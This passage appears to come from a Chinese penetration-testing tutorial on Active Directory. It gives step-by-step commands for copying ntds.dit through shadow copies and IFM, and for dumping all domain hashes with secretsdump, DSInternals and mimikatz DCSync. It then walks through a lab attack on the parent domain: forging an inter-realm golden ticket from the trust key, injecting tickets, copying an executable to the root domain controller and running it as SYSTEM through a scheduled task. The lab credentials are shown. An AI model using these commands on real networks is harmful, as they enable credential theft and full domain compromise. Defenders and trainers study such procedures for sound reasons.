<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ntdsutil.exe snapshot &quot;activate instance ntds&quot; create q q<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649904.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第二步：加载快照</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ntdsutil.exe snapshot &quot;mount &#123;738aac0f-ee3c-4da1-993a-c6b8f3868120&#125;&quot; q q<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649907.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到快照的地址为C:$SNAP_202403251747_VOLUMEC$\</p>
<p>第三步：复制快照中的ntds.dit文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">copy &#x27;快照地址\Windows\NTDS\ntds.dit&#x27; 目标地址<br>copy C:\$SNAP_202403251747_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\admins\Desktop\ntds\ntds.dit<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649910.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第四部：删除快照</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ntdsutil.exe snapshot &quot;umount &#123;993a6c93-7886-43a4-8b4b-467d8ace1942&#125;&quot; &quot;delete &#123;993a6c93-7886-43a4-8b4b-467d8ace1942&#125;&quot; q q<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649909.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="vssadmin提取ntds-dit"><a href="#vssadmin提取ntds-dit" class="headerlink" title="vssadmin提取ntds.dit"></a>vssadmin提取ntds.dit</h3><p>vssadmin1是Windows Server 2008及Windows 7系统提供的VSS管理工具，它可以用于创建或删除卷 影副本，列出卷影副本的信息（只能管理系统Provider创建的卷影副本）。还可以用于显示所有安装的 所有卷影副本写入程序（writers）和提供程序（providers），以及改变卷影副本存储空间（即所谓的  “diﬀ空间” ）的大小等。支持的操作系统：  Server 2008、Server 2012</p>
<p>第一步：创建快照</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ssadmin create shadow /for=c:<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649915.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第二步：复制文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit C:\Users\admins\Desktop\ntds\ntds.dit<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649202.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第三步：删除快照</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">vssadmin delete shadows /for=c: /quiet<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649216.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="vssown提取ntds-dit"><a href="#vssown提取ntds-dit" class="headerlink" title="vssown提取ntds.dit"></a>vssown提取ntds.dit</h3><p>vssown.vbs和vssadmin类似，它是由Tim Tomes开发完成的，它可以创建和删除卷影副本，以及启动 和停止卷影复制服务</p>
<p>第一步：启动卷影复制服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">cscript vssown.vbs /start<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649226.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第二步：创建一个C盘的卷影副本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">cscript vssown.vbs /create c<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649235.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第三步：列出当前卷影副本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">cscript vssown.vbs /list<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649250.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第四步：复制文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds\ntds.dit<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649273.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第五步：删除卷影副本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">cscript vssown.vbs /delete &#123;B267559B-57D8-4D59-B77F-890CF57BA448&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649463.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="IFM"><a href="#IFM" class="headerlink" title="IFM"></a>IFM</h3><p>可以通过创建一个IFM 的方式获取ntds.dit，在使用 ntdsutil 创建媒体安装集（IFM）时，需要进行生 成快照、加载、将ntds.dit 和计算机的SAM 文件复制到目标文件夹中等操作，这些操作也可以通过    PowerShell 或VMI 远程执行。</p>
<p>第一步：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ntdsutil &quot;ac i ntds&quot; &quot;ifm&quot; &quot;create full c:/test&quot; q q<br></code></pre></td></tr></table></figure>

<p>此时ntds.dit 将被保存在C:\test\Active Directory 下， SYSTEN 和SECURITY 两个文件将被保存在 C:\test\registry 文件夹下</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649479.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649531.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>第二步：删除</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">rmdir /s/q C:\test<br></code></pre></td></tr></table></figure>

<h3 id="impacket"><a href="#impacket" class="headerlink" title="impacket"></a>impacket</h3><p>通过impacket 里的secretsdump.py 脚本可以直接远程读取ntds.dit 并导出哈希值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">secretsdump.exe 域名/administrator:密码@IP -outputfile output_ntds<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649542.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="离线方式读取ntds-dit文件"><a href="#离线方式读取ntds-dit文件" class="headerlink" title="离线方式读取ntds.dit文件"></a>离线方式读取ntds.dit文件</h2><p>离线一般需要两步：</p>
<p>1、将远端域控的ntds.dit下载到本地，</p>
<p>2、然后利用再在本地进行。</p>
<p>注意：因为system.hive 里存放着ntds.dit 的秘钥，所以需要转储system.hive ，不然没法查看ntds.dit 里内容</p>
<p>命令如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">reg save hklm\system c:\windows\temp\system.hive<br></code></pre></td></tr></table></figure>

<p>下面介绍几种方式离线读取ntds.dit文件</p>
<h3 id="esedbexport"><a href="#esedbexport" class="headerlink" title="esedbexport"></a>esedbexport</h3><p>1、我么以kali为例子，安装esedbexport</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plain">apt-get install autoconf automake autopoint libtool pkg-config<br>wget https://github.com/libyal/libesedb/releases/download/20210424/libesedb- experimental-20210424.tar.gz<br>tar zxvf libesedb-experimental-20210424.tar.gz<br>cd libesedb-20210424<br>./configure<br>make<br>make install<br>ldconfig<br></code></pre></td></tr></table></figure>

<p>2、导出 ntds.dit，两个重要的表为：  datatable以及link_table，他们都会被存放在.&#x2F;ntds.dit.export&#x2F;文 件夹中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">esedbexport -m tables ntds.dit<br></code></pre></td></tr></table></figure>

<p>3、安装ntdsxtract</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">git clone https://github.com/csababarta/ntdsxtract.git<br>cd ntdsxtract<br>python setup.py build<br>python setup.py install<br></code></pre></td></tr></table></figure>

<p>如果提示ImportError: No module named Crypto.Hash，请执行 pip install pycryptodome</p>
<p>4、将ntds.dit.export 和SYSTEM 文件放入到ntdsxtract 工具的文件夹中，然后导出哈希值，最后的 结果将保存在1.txt 里</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">python2 dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7<br>output --syshive SYSTEM --passwordhasher --pwdformat ocl --ntoufile atout --<br>lmoufile lmout | tee 1.txt<br></code></pre></td></tr></table></figure>

<h3 id="impacket-1"><a href="#impacket-1" class="headerlink" title="impacket"></a>impacket</h3><p>将ntds.dit.export 和SYSTEM 文件放入到和secretsdump.exe 同级目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">secretsdump.exe -system system.hive -ntds ntds.dit LOCAL<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649553.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="NTDSDump-exe"><a href="#NTDSDump-exe" class="headerlink" title="NTDSDump.exe"></a>NTDSDump.exe</h3><p>NTDSDumpEx.exe可以进行导出哈希值的操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">NTDSDumpEx -d ntds.dit -s system -o 1.txt<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649605.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="DSInternals"><a href="#DSInternals" class="headerlink" title="DSInternals"></a>DSInternals</h3><p>DSInternals是powershell脚本，可以离线读取ntds文件</p>
<p>安装DSInternals</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">Install-Module DSInternals -Force<br></code></pre></td></tr></table></figure>

<p>导出hash，并保存在txt 文件里</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">$key = Get-Bootkey -SystemHivePath &#x27;system路径 &#x27;<br>Get-ADDBAccount -All -DBPath &#x27;ntds路径 &#x27; -Bootkey $key | Out-File output_hash.txt<br></code></pre></td></tr></table></figure>



<h2 id="在线方式读取ntds-dit文件"><a href="#在线方式读取ntds-dit文件" class="headerlink" title="在线方式读取ntds.dit文件"></a>在线方式读取ntds.dit文件</h2><p>在线的方式就是直接读取不需要在导出ntds文件,在域环境中，不要直接在线获取hash，特别是域环境比较大的时候，在线获取hash等待时时间较长，工具占用资源太多，容易造成域控服务器崩溃</p>
<h3 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h3><p>1、可以读取所有用户的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">lsadump::dcsync /domain:hsmyzj.xyz /all /csv<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649725.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>2、也可以读取单个用户的hash(同样这里我们还是用不了，暂时用上一条吧)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">lsadump::dcsync /domain:hsmyzj.xyz /user:administrator<br></code></pre></td></tr></table></figure>

<h3 id="Quarks-PwDump"><a href="#Quarks-PwDump" class="headerlink" title="Quarks PwDump"></a>Quarks PwDump</h3><p>1、上传工具到目标机器，使用命令先导出ntds文件，然后直接读取</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649782.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="impacket-2"><a href="#impacket-2" class="headerlink" title="impacket"></a>impacket</h3><p>使用secretsdump直接读取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">secretsdump.exe 域名/administrator:密码@IP -outputfile output_ntds<br>secretsdump.exe hsmyzj.xyz/administrator:Abc123..@192.168.3.191 -outputfile 1.txt<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649795.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="Invoke-DCSync"><a href="#Invoke-DCSync" class="headerlink" title="Invoke-DCSync"></a>Invoke-DCSync</h3><p>Invoke-DCSyncs是powershell脚本可以在线读取内存中的用户hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">Import-Module .\Invoke-DCSync.ps1<br>Invoke-DCSync -PWDumpFormat<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649920.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="跨域攻击介绍"><a href="#跨域攻击介绍" class="headerlink" title="跨域攻击介绍"></a>跨域攻击介绍</h2><h3 id="内网中的域林"><a href="#内网中的域林" class="headerlink" title="内网中的域林"></a>内网中的域林</h3><p>很多大型企业都拥有自己的内网， 一般通过域林进行共享资源。根据不同职能区分的部门，从逻辑上以 主域和子域进行区分，以方便统一管理。在物理层，通常使用防火墙将各个子公司及各个部门划分为不同的区域。</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649938.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="跨域攻击方法"><a href="#跨域攻击方法" class="headerlink" title="跨域攻击方法"></a>跨域攻击方法</h3><p>1、常规渗透方法（利用web漏洞）</p>
<p>2、哈希传递票据攻击</p>
<p>3、利用域信任关系													</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649971.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>域信任关系</strong></p>
<p>建立域之间的信任关系，是为了一个域的用户能方便地访问其他域的资源，同时也方便了对域网络的管 理和维护，域信任作为域中的一种机制，允许另一个域的用户在通过身份验证后访问本域中的资源。同 时，域信任利用DNS服务器定位两个不同子域的域控制器，如果两个域中的域控制器都无法找到另一个</p>
<p>域，也就不存在通过域信任关系进行跨域资源共享了</p>
<p><strong>域信任关系分类</strong></p>
<p>域信任关系分为单向信任和双向信任</p>
<p>单向信任：是指在两个域之间创建单向的信任路径，即在一个方向上是信任流，在另一个方向上是访问 流，受信任域内的用户（或者计算机）可以访问信任域内的资源，但信任域内的用户无法访问受信任域 内的资源。也就是说，  A域信任B域，那么B域内受信任的主体可以访问A域内信任B域的资源。</p>
<p>双向信任：是指两个单向信任的组合，信任域和受信任域彼此信任，在两个方向上都有信任流和访问</p>
<p>流。这意味着，可以从两个方向在两个域之间传递身份验证请求。活动目录中的所有信任关系都是双向 可传递的。在创建子域时，会在新的父域和子域之间自动创建双向可传递信任关系，从下级域发出的身 份验证请求可以通关其父域向上流向信任域</p>
<p>域信任关系也可以分为内部信任和外部信任</p>
<p>内部信任：在默认情况下,用活动目录安装向导将新域添加到域树或林根域中，会自动创建双向可传递信 任。在现有林中创建域树时，将建立新的树根信任，当前域树中的两个或多个域之间的信任关系被称为  内部信任。这种信任关系是可传递的。例如，有三个子域BA,CA,DA,BA域信任CA域， CA域信任DA域，</p>
<p>则BA域也信任DA域。</p>
<p>外部信任是指两个不同林中的域的信任关系。外部信任是不可传递的，而且是单向的。</p>
<p>只有domain admins组中的用户可以管理域信任关系</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649018.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="搭建和查看域信任关系"><a href="#搭建和查看域信任关系" class="headerlink" title="搭建和查看域信任关系"></a>搭建和查看域信任关系</h2><h3 id="获取域信息"><a href="#获取域信息" class="headerlink" title="获取域信息"></a>获取域信息</h3><p>在域中，  Enterprise Admins组（出现在林中的根域中）的成员具有对目录林中所有域的完全控制权</p>
<p>限。在默认情况下，该组包含林中所有域控制器上具有Administrators权限的成员</p>
<p>查看当前域中计算机的权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">whoami /all<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649097.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用lg工具获取域的相关信息</p>
<p>查看域信任关系</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649174.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>获取当前域中的用户组</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">LG.exe 域名\.<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649329.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>获取远程机器的本地用户组</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">LG.exe \\计算机名 -lu<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649358.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>获取远程系统中的用户SID</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">LG.exe \\计算机名 -lu -sidsout<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649391.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="利用域信任密钥获取目标域"><a href="#利用域信任密钥获取目标域" class="headerlink" title="利用域信任密钥获取目标域"></a>利用域信任密钥获取目标域</h2><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><table>
<thead>
<tr>
<th><strong>IP****地址</strong></th>
<th><strong>所属域</strong></th>
<th><strong>域中地位</strong></th>
<th><strong>机器名</strong></th>
<th><strong>当前登录用户</strong></th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://192.168.41.10/">192.168.</a>3.191</td>
<td>hsmyzj.xyz</td>
<td>根域的域控</td>
<td>AD-2016</td>
<td>hsmyzj\administrator</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://192.168.41.170/">192.168.</a>3.187</td>
<td>son.hsmyzj.xyz</td>
<td>子域的域控</td>
<td>son</td>
<td>son\administrator</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://192.168.41.175/">192.168.</a>3.181</td>
<td>son.hsmyzj.xyz</td>
<td>子域中的机器</td>
<td>win10</td>
<td>son\hsmyzj</td>
</tr>
</tbody></table>
<p>当前已经控制son.hsmyzj.xyz域，其中包括son机器(域控)和win10机器</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649414.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>实验步骤</strong></p>
<p>当前无法访问AD-2016.hsmyzj.xyz</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649452.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用mimikatz获取 当前域的 SID  父域的 SID  子域域管的NTLM  信任密钥</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">mimikatz &quot;privilege::debug&quot; &quot;lsadump::lsa /patch /user:hsmyzj$&quot; &quot;lsadump::trust /patch&quot; exit<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649638.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649647.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>在普通的域内用户中创建创建高权限票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">mimikatz.exe &quot;kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi&quot;  exit<br><br>mimikatz kerberos::golden /domain:son.hsmyzj.xyz /sid:S-1-5-21-3711810844-2552107112-2058687077 /sids:S-1-5-21-2640154217-865433244-3862815811-519 /rc4:a806fce1bdbf24e9a72edeb1f5f2a76d /user:hsmyzj /service:krbtgt /target:hsmyzj.xyz /ticket:subdc_administrator.kirbi<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649660.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>上传asktgs.exe和kirbikator.exe工具， asktgs.exe伪造票据，  kirbikator.exe注入票据</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649694.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>创建CIFS服务的票据进行复制文件的操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell asktgs.exe administrator.kirbi CIFS/AD-2016.hsmyzj.xyz<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649717.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>将票据注入内存</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell kirbikator.exe lsa CIFS.DC.hack.com.kirbi<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649832.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>访问域控</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell dir \\AD-2016.hsmyzj.xyz\c$<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649913.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>服务恶意文件,如果复制失败，请注入host服务票据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell copy a.exe \\AD-2016.hsmyzj.xyz\c$<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649937.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>伪造host服务，进行创建计划任务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell asktgs.exe subdc_administrator123.kirbi host/AD-2016.hsmyzj.xyz<br></code></pre></td></tr></table></figure>

<p>将票据注入内存</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell kirbikator.exe lsa host.AD-2016.hsmyzj.xyz.kirbi<br></code></pre></td></tr></table></figure>

<p>创建计划任务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">schtasks /create /s AD-2016.hsmyzj.xyz /tn test /sc onstart /tr c:\b.exe /ru system /f<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649949.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>执行计划任务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">schtasks /run /s AD-2016.hsmyzj.xyz /i /tn &quot;test&quot;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649970.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>上线</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649999.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="利用krbtgt哈希值获取目标域"><a href="#利用krbtgt哈希值获取目标域" class="headerlink" title="利用krbtgt哈希值获取目标域"></a>利用krbtgt哈希值获取目标域</h2><h3 id="实验环境-1"><a href="#实验环境-1" class="headerlink" title="实验环境"></a>实验环境</h3><table>
<thead>
<tr>
<th><strong>IP****地址</strong></th>
<th><strong>所属域</strong></th>
<th><strong>域中地位</strong></th>
<th><strong>机器名</strong></th>
<th><strong>当前登录用户</strong></th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://192.168.41.10/">192.168.</a>3.191</td>
<td>hsmyzj.xyz</td>
<td>根域的域控</td>
<td>AD-2016</td>
<td>hsmyzj\administrator</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://192.168.41.170/">192.168.</a>3.187</td>
<td>son.hsmyzj.xyz</td>
<td>子域的域控</td>
<td>son</td>
<td>son\administrator</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://192.168.41.175/">192.168.</a>3.181</td>
<td>son.hsmyzj.xyz</td>
<td>子域中的机器</td>
<td>win10</td>
<td>son\hsmyzj</td>
</tr>
</tbody></table>
<p>当前已经控制son.hsmyzj.xyz域，其中包括son机器和win10机器</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649081.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>实验步骤</strong></p>
<p>获取Krbtgt散列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">lsadump::lsa /patch /user:krbtgt<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711514712434-a3becd49-b4e8-4e80-bfb8-3e059f7aa445.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>获取关键信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">lsadump::trust /patch<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711514759655-933d9364-004d-4244-92de-d156ac564d34.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>构造并注入黄金票据</p>
